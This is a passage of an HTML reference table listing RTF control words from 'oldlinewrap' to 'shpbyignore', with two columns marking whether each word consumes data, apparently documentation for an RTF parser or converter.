<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oldlinewrap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">oldpprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oldsprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oldtprops</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">oleclsid</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">operator</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">otblrul</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">overlay</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pagebb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">panose</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pard</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">password</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">passwordhash</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pca</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrfoot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrhead</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrsnap</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgbrdrt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnbidia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnbidib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgncont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndec</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgndecd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindic</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhindid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsh</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnhnsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnlcltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnlcrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnthaia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnthaib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnthaic</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnucltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnucrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnvieta</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pgp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pgptbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">phcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">phmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">phpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">picbmp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">picprop</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">picscaled</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pindtabqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pindtabql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pindtabqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">plain</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pmartabqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pmartabql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pmartabqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnacross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnaiu</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnaiud</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnaiueo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnaiueod</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnbidia</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnbidib</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pncard</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndec</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pndecd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngblip</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnhang</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pniroha</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnirohad</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlcltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlcrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlvlblt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlvlbody</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnlvlcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnnumonce</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnord</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnordt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnprev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnqc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnqr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnrnot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnseclvl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pntext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pntxta</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pntxtb</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pnucltr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnucrm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuld</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldash</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldashd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldashdd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnuldb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulhair</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulw</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnulwave</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posxr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyout</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">posyt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">prcolbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">printdata</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">printim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">private</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">propname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">protend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">protstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">protusertbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">psover</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptabldot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptablmdot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptablminus</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptablnone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ptabluscore</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pubauto</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">pvmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pvpara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pvpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">pxe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ql</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">qt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkbdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkdcross</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkhor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgdkvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgfdiag</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbghoriz</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rawclbgvert</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">readonlyrecommended</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">readprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">remdttm</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rempersonalinfo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">result</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">revisions</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">revprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">revtbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">revtim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">rsidtbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltbmp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rslthtml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltmerge</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltpict</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rsltrtf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rslttxt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtldoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlgutter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlpar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rtlsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">rxe</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">saftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sautoupd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saveinvalidxml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">saveprevpict</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">sbkcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbkeven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbknone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbkodd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbkpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sbys</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">scompose</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectdefaultcl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectspecifycl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectspecifygen</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">sectspecifyl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sectunlocked</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnbj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftnrstpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">sftntj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shidden</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shift</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">shpbxcolumn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbxignore</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbxmargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbxpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">shpbyignore</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
